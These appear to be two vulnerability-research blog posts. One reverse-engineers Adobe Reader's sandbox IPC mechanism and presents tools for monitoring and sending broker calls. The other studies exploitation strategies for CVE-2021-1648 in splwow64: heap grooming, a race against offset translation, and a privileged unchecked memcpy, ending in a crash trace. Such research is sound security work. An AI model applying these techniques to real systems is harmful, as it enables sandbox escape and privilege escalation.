Let’s walk through what an actual request looks like. Making an IPC request requires the target to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
const size_t kExtendedReturnCount = 8;

struct CrossCallParams {
  uint32 tag_;
  uint32 is_in_out_;
  CrossCallReturn call_return;
  size_t params_count_;
};

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

union MultiType {
  uint32 unsigned_int;
  void* pointer;
  HANDLE handle;
  ULONG_PTR ulong_ptr;
};

I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.

There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// [ tag                4 bytes]
// [ IsOnOut            4 bytes]
// [ call return       52 bytes]
// [ params count       4 bytes]
// [ parameter 0 type   4 bytes]
// [ parameter 0 offset 4 bytes] ---delta to ---\
// [ parameter 0 size   4 bytes]                |
// [ parameter 1 type   4 bytes]                |
// [ parameter 1 offset 4 bytes] ---------------|--\
// [ parameter 1 size   4 bytes]                |  |
// [ parameter 2 type   4 bytes]                |  |
// [ parameter 2 offset 4 bytes] ----------------------\
// [ parameter 2 size   4 bytes]                |  |   |
// |---------------------------|                |  |   |
// | value 0     (x bytes)     | <--------------/  |   |
// | value 1     (y bytes)     | <-----------------/   |
// |                           |                       |
// | end of buffer             | <---------------------/
// |---------------------------|

A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.

Each parameter is then sequentially represented by a ParamInfo structure:

1
2
3
4
5
struct ParamInfo {
  ArgType type_;
  ptrdiff_t offset_;
  size_t size_;
};

The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.

Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:

1
2
3
4
5
6
7
8
9
0:009> dd 2a10000+0x134
02a10134  00000003 00000000 00000000 00000000
02a10144  00000000 00000000 000002cc 00000001
02a10154  00000000 00000000 00000000 00000000
02a10164  00000000 00000000 00000000 00000007
02a10174  00000001 000000a0 00000086 00000002
02a10184  00000128 00000004 00000002 00000130
02a10194  00000004 00000002 00000138 00000004
02a101a4  00000002 00000140 00000004 00000002

0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170). The first argument is type 0x1 (we’ll describe types later on), is at delta offset 0xa0, and is 0x86 bytes in size. Thus:

1
2
3
4
5
6
7
8
9
10
11
12
13
0:009> dd 2a10000+0x134+0xa0
02a101d4  003f005c 005c003f 003a0043 0055005c
02a101e4  00650073 00730072 0062005c 0061006a
02a101f4  006a0066 0041005c 00700070 00610044
02a10204  00610074 004c005c 0063006f 006c0061
02a10214  006f004c 005c0077 00640041 0062006f
02a10224  005c0065 00630041 006f0072 00610062
02a10234  005c0074 00430044 0052005c 00610065
02a10244  00650064 004d0072 00730065 00610073
0:009> du 2a10000+0x134+0xa0
02a101d4  "\??\C:\Users\bjaff\AppData\Local"
02a10214  "Low\Adobe\Acrobat\DC\ReaderMessa"
02a10254  "ges"

This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.

With this information, we can craft a buffer targeting IPC tag 3 and move onto sending it. To do this, we require the IPCControl structure. This is a simple structure defined at the start of the IPC shared memory section:

1
2
3
4
5
struct IPCControl {
    size_t channels_count;
    HANDLE server_alive;
    ChannelControl channels[1];
};

And in the IPC shared memory section:

1
2
3
0:009> dd 2a10000
02a10000  0000000f 00000088 00000134 00000001
02a10010  00000010 00000014 00000003 00020134

So we have 16 channels, a handle to server_alive, and the start of our ChannelControl array.

The server_alive handle is a mutex used to signal if the server has crashed. It’s used during tag invocation in SharedmemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.

ChannelControl is a structure that describes a channel, and is again defined as:

1
2
3
4
5
6
7
struct ChannelControl {
  size_t channel_base;
  volatile LONG state;
  HANDLE ping_event;
  HANDLE pong_event;
  uint32 ipc_tag;
};

The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.

state is an enum that describes the state of the channel:

1
2
3
4
5
6
7
enum ChannelState {
  kFreeChannel = 1,
  kBusyChannel,
  kAckChannel,
  kReadyChannel,
  kAbandonnedChannel
};

The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and ready for the server, it signals:

1
2
3
4
  DWORD wait = ::SignalObjectAndWait(channel[num].ping_event,
                                     channel[num].pong_event,
                                     kIPCWaitTimeOut1,
                                     FALSE);

When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.

A channel is fetched via SharedMemIPCClient::LockFreeChannel and is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.

Writing out the CrossCallParams has a few nuances. First, the number of actual parameters is NUMBER_PARAMS+1. According to the source:

1
2
3
4
// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.

This can be observed in the CopyParamIn function:

1
2
3
4
param_info_[index + 1].offset_ = Align(param_info_[index].offset_ +
                                            size);
param_info_[index].size_ = size;
param_info_[index].type_ = type;

Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:

1
2
3
4
5
6
7
8
// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
  size_t alignment = sizeof(ULONG_PTR) * 2;
    return ((value + alignment - 1) / alignment) * alignment;
    }

Because the Reader process is x86, the alignment is always 8.

The pseudo-code for writing out our CrossCallParams can be distilled into the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
write_uint(buffer,     tag);
write_uint(buffer+0x4, is_in_out);

// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);

write_uint(buffer+0x3c, param_count);

// calculate initial delta 
delta = ((param_count + 1) * 12) + 12 + 52;

// write out the first argument's offset 
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);

for idx in range(param_count):
    
    write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
    write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);

    // ...write out argument data. This varies based on the type

    // calculate new delta
    delta = Align(delta + size)
    write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);

// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);

Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.

Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:

1
2
 thread_provider_->RegisterWait(this, service_context->ping_event,
                                ThreadPingEventReady, service_context);

RegisterWait is just a thread pool wrapper around a call to RegisterWaitForSingleObject.

The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event mutex.

InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholder:

1
2
3
4
5
6
7
8
9
10
11
12
ArgType = {
    0: "INVALID_TYPE",
    1: "WCHAR_TYPE", 
    2: "ULONG_TYPE",
    3: "UNISTR_TYPE", # treated same as WCHAR_TYPE
    4: "VOIDPTR_TYPE",
    5: "INPTR_TYPE",
    6: "INOUTPTR_TYPE",
    7: "ASCII_TYPE",
    8: "MEM_TYPE", 
    9: "LAST_TYPE" 
}

These are taken from internal_types, but you’ll notice there are two additional types: ASCII_TYPE and MEM_TYPE, and are unique to Reader. ASCII_TYPE is, as expected, a simple 7bit ASCII string. MEM_TYPE is a memory structure used by the broker to read data out of the sandboxed process, ie. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.

Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.

Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:

1
*param = *(reinterpret_cast<void**>(start));

This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.

In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.

INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.

The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:

1
2
3
4
5
struct MEM_TYPE {
  HANDLE hProcess;
  DWORD lpBaseAddress;
  SIZE_T nSize;
};

As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy. Each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.

Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:

1
2
3
ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady

The handler is fetched from PolicyBase::OnMessageReady, which winds up calling Dispatcher::OnMessageReady. This is a pretty simple function that crawls the registered IPC tag list for the correct handler. We finally hit InvokeCallbackArgs, unique to Reader, which invokes the handler with the proper argument count:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
switch ( ParamCount )
  {
    case 0:
      v7 = callback_generic(_this, CrossCallParamsEx);
      goto LABEL_20;
    case 1:
      v7 = ((int (__thiscall *)(void *, int, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args);
      goto LABEL_20;
    case 2:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args, args[1]);
      goto LABEL_20;
    case 3:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD, _DWORD))callback_generic)(
             _this,
             CrossCallParamsEx,
             *args,
             args[1],
             args[2]);
      goto LABEL_20;

[...]

In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.

A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.

Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined here and, repeated from above, defined as:

1
2
3
4
5
6
7
8
9
10
11
12
struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

This 52 byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:

1
2
3
4
5
6
7
8
9
10
11
12
 if (error) {
    if (handler)
      SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
  } else {
    memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
    SetCallSuccess(call_result);
    if (params->IsInOut()) {
      // Maybe the params got changed by the broker. We need to upadte the
      // memory section.
      memcpy(ipc_buffer, params.get(), output_size);
    }
  }

and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.

Tags

Now that we understand how the IPC mechanism itself works, let’s examine the implemented tags in the sandbox. Tags are registered during initialization by a function we’ll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initalizers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:

1
2
3
4
5
typedef struct SandTag {
  DWORD IPCTag;
  ArgType Arguments[17];
  LPVOID Handler;
};

The Arguments array is initialized to INVALID_TYPE and ignored if the tag does not use all 17 slots. Here’s an example of a tag structure:

1
2
3
4
5
.rdata:00DD49A8 IpcTag3         dd 3                    ; IPCTag
.rdata:00DD49A8                                         ; DATA XREF: 000190FA↑r
.rdata:00DD49A8                                         ; 00019140↑o ...
.rdata:00DD49A8                 dd 1, 6 dup(2), 0Ah dup(0); Arguments
.rdata:00DD49A8                 dd offset FilesystemDispatcher__NtCreateFile; Handler

Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what know to be the NtCreateFile tag handler.

Each tag is part of a group that denotes its behavior. There are 20 groups in total:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SandboxFilesystemDispatcher
SandboxNamedPipeDispatcher
SandboxProcessThreadDispatcher
SandboxSyncDispatcher
SandboxRegistryDispatcher
SandboxBrokerServerDispatcher
SandboxMutantDispatcher
SandboxSectionDispatcher
SandboxMAPIDispatcher
SandboxClipboardDispatcher
SandboxCryptDispatcher
SandboxKerberosDispatcher
SandboxExecProcessDispatcher
SandboxWininetDispatcher
SandboxSelfhealDispatcher
SandboxPrintDispatcher
SandboxPreviewDispatcher
SandboxDDEDispatcher
SandboxAtomDispatcher
SandboxTaskbarManagerDispatcher

The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process. SandboxBrokerServerDispatcher, for example, can have a sway of approximately 25 tags.

Instead of providing a description of each dispatcher in this post, I’ve instead put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I’ll add my notes on the calls. I’ve additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.

libread

Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time, allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.

libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.

The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and it is held by the broker alone. This means it’s not somewhere predictable in shared memory and we’ve got to scan the broker’s memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.

In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:

1
2
3
4
5
6
7
$ sander.exe -h
[-] sander: [action] <pid>
          -m   -  Monitor mode
          -d   -  Dump channels
          -t   -  Trigger test call (tag 62)
          -c   -  Capture IPC traffic and log to disk
          -h   -  Print this menu

The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ sander.exe -m 6132
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 266 1 Parameters
      WCHAR_TYPE: _WVWT*&^$
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 34  1 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 247 2 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: Software\Adobe\Acrobat Reader\DC\SessionManagement
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[6020] ESP: 037dfca4    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWindowsCurrent
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 0000043c
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWin0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cTab0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000298
      ULONG_TYPE: 000f003f
[2572] ESP: 0335fd5c    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cPathInfo
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 000003cc
      ULONG_TYPE: 000f003f

We’re also able to dump all IPC calls in the brokers’ channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread as well as allows you to test out additional tooling.

The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.

That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shooken out.

Resources

On Exploiting CVE-2021-1648 (splwow64 LPE)

10 March 2021 at 21:10

In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.

This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then, that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.

This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kasperksy in their great analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look at how they finally chose to patch the bug later β€” for now.

I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4]. Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.

To catch you up very briefly, though: splwow64 exposes an LPC endpoint that any process can connect to and send requests. These requests carry opcodes and input parameters to a variety of printer functions (OpenPrinter, ClosePrinter, etc.). These functions occasionally require pointers as input, and thus the input buffer needs to support those.

As alluded to, Microsoft chose to instead use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accomodate this need. Here’s UMPDPointerFromOffset:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int64 UMPDPointerFromOffset(unsigned int64 *lpOffset, int64 lpBufStart, unsigned int dwSize)
{
  unsigned int64 Offset;

  if ( lpOffset && lpBufStart )
  {
    Offset = *lpOffset;
    if ( !*lpOffset )
      return 1;
    if ( Offset <= 0x7FFFFFFF && Offset + dwSize <= 0x7FFFFFFF )
    {
      *lpOffset = Offset + lpBufStart;
      return 1;
    }
  }
  return 0;
}

So as per the GP0 post, the buffer addresses are indeed restricted to <=0x7fffffff. Implicit in this is also the fact that our offset is unsigned, meaning we can only work with positive numbers; therefore, if our target address is somewhere below our lpBufStart, we’re out of luck.

This new offset strategy kills the previous techniques used to exploit this vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a global function pointer. When request 0x6A is called, a function (bLoadSpooler) is used to resolve a dozen or so winspool functions used for interfacing with printers:

These global variables are β€œprotected” by RtlEncodePointer, as detailed by Kaspersky[3], but this is relatively trivial to break when executing locally. Using the memcpy with arbitrary src/dst addresses, they were able to overwrite the function pointers and replace one with a call to LoadLibrary.

Unfortunately, now that offsets are used, we can no longer target any arbitrary address. Not only are we restricted to 32-bit addresses, but we are also restricted to addresses >= the message buffer and <= 0x7fffffff.

I had a few thoughts/strategies here. My first attempt was to target UMPD cookies. This was part of a mitigation added after 0986 as again described by Kaspersky. Essentially, in order to invoke the other functions available to splwow64, we need to open a handle to a target printer. Doing this, GDI creates a cookie for us and stores it in an internal linked list. The cookie is created by LoadUserModePrinterDriverEx and is of type UMPD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
typedef struct _UMPD {
    DWORD               dwSignature;        // data structure signature
    struct _UMPD *      pNext;             // linked list pointer
    PDRIVER_INFO_2W     pDriverInfo2;       // pointer to driver info
    HINSTANCE           hInst;              // instance handle to user-mode printer driver module
    DWORD               dwFlags;            // misc. flags
    BOOL                bArtificialIncrement; // indicates if the ref cnt has been bumped up to
    DWORD               dwDriverVersion;    // version number of the loaded driver
    INT                 iRefCount;          // reference count
    struct ProxyPort *  pp;                 // UMPD proxy server
    KERNEL_PVOID        umpdCookie;         // cookie returned back from proxy
    PHPRINTERLIST       pHandleList;        // list of hPrinter's opened on the proxy server
    PFN                 apfn[INDEX_LAST];   // driver function table
} UMPD, *PUMPD;

When a request for a printer action comes in, GDI will check if the request contains a valid printer handle and a cookie for it exists. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0:006> dq poi(g_ulLastUmpdCookie-8)
00000000`00bce1e0  00000000`fedcba98 00000000`00000000
00000000`00bce1f0  00000000`00bcdee0 00007ffb`64dd0000
00000000`00bce200  00000000`00000001 00000001`00000000
00000000`00bce210  00000000`00000000 00000000`00000001
00000000`00bce220  00000000`00bc8440 00007ffb`64dd2550
00000000`00bce230  00007ffb`64dd2d20 00007ffb`64dd2ac0
00000000`00bce240  00007ffb`64dd2de0 00007ffb`64dd30f0
00000000`00bce250  00000000`00000000
0:006> dps poi(g_ulLastUmpdCookie-8)+(8*9) l5
00000000`00bce228  00007ffb`64dd2550 mxdwdrv!DrvEnablePDEV
00000000`00bce230  00007ffb`64dd2d20 mxdwdrv!DrvCompletePDEV
00000000`00bce238  00007ffb`64dd2ac0 mxdwdrv!DrvDisablePDEV
00000000`00bce240  00007ffb`64dd2de0 mxdwdrv!DrvEnableSurface
00000000`00bce248  00007ffb`64dd30f0 mxdwdrv!DrvDisableSurface

This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.

Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:

1
(MType = lpMsgBuf[1], MType >= 0x6A) && (MType <= 0x6B || MType - 109 <= 7) )

This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.

Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for awhile, I discovered a helpful primitive.

When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
MessageSize = 0;
if ( *(_WORD *)ProxyMsg == 0x20 && *((_QWORD *)this + 9) )
{
  MessageSize = *((_DWORD *)ProxyMsg + 10);
  if ( MessageSize - 16 > 0x7FFFFFEF )
    goto LABEL_66;
  lpMsgBuf = (unsigned int *)operator new[](MessageSize);
}

...

if ( lpMsgBuf )
{
  rMessageSize = MessageSize;
  memcpy_s(lpMsgBuf, MessageSize, *((const void *const *)ProxyMsg + 6), MessageSize);
  ...
}

Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PortView 1008 heap: 0x0000000000DD9E90
PortView 1020 heap: 0x0000000002B43FE0
PortView 1036 heap: 0x0000000000DD9E90
PortView 1048 heap: 0x0000000002B43FE0
PortView 1060 heap: 0x0000000000DD9E90
PortView 1072 heap: 0x0000000002B43FE0
PortView 1084 heap: 0x0000000000DD9E90
PortView 1096 heap: 0x0000000002B43FE0
PortView 1108 heap: 0x0000000000DD9E90
PortView 1120 heap: 0x0000000002B43FE0
PortView 1132 heap: 0x0000000000DD9E90
PortView 1144 heap: 0x0000000002B43FE0
PortView 1156 heap: 0x0000000000DD9E90
PortView 1168 heap: 0x0000000002B43FE0
PortView 1180 heap: 0x0000000000DD9E90
PortView 1192 heap: 0x0000000002B43FE0
PortView 1204 heap: 0x0000000000DD9E90
PortView 1216 heap: 0x0000000002B43FE0
PortView 1228 heap: 0x0000000000DD9E90
PortView 1240 heap: 0x0000000002B43FE0

Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.

After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered β€œprivileged”. How privileged, you ask? Well, let’s see what 0x76 does:

1
2
3
4
5
6
7
case 0x76u:
  v3 = *(_QWORD *)(lpMsgBuf + 32);
  if ( v3 )
  {
    memcpy_0(*(void **)(lpMsgBuf + 32), *(const void **)(lpMsgBuf + 24), *(unsigned int *)(lpMsgBuf + 40));
    *a2 = v3;
  }

A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.

After rigging up some threads to spray, I quickly identified a crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(1b4.1a9c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpAllocateHeap+0x833:
00007ff9`ab669e83 4d8b4a08        mov     r9,qword ptr [r10+8] ds:00000076`00000008=????????????????
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff9`ab6673d4     : 00000000`01500000 00000000`00800003 00000000`00002000 00000000`00002010 : ntdll!RtlpAllocateHeap+0x833
01 00007ff9`ab6b76e7     : 00000000`00000000 00000000`012a0180 00000000`00000000 00000000`00000000 : ntdll!RtlpAllocateHeapInternal+0x6d4
02 00007ff9`ab6b75f9     : 00000000`01500000 00000000`00000000 00000000`012a0180 00000000`00000080 : ntdll!RtlpAllocateUserBlockFromHeap+0x63
03 00007ff9`ab667eda     : 00000000`00000000 00000000`00000310 00000000`000f0000 00000000`00000001 : ntdll!RtlpAllocateUserBlock+0x111
04 00007ff9`ab666e2c     : 00000000`012a0000 00000000`00000000 00000000`00000300 00000000`00000000 : ntdll!RtlpLowFragHeapAllocFromContext+0x88a
05 00007ff9`a9f39d40     : 00000000`00000000 00000000`00000300 00000000`00000000 00007ff9`a9f70000 : ntdll!RtlpAllocateHeapInternal+0x12c
06 00007ff6`faeac57f     : 00000000`00000300 00000000`00000000 00000000`01509fd0 00000000`00000000 : msvcrt!malloc+0x70
07 00007ff6`faea7c76     : 00000000`00000300 00000000`01509fd0 00000000`015018e0 00000000`00000000 : splwow64!operator new+0x23
08 00007ff6`faea8ada     : 00000000`00000000 00000000`01501678 00000000`0150e340 00000000`0150e4f0 : splwow64!TLPCMgr::ProcessRequest+0x9e

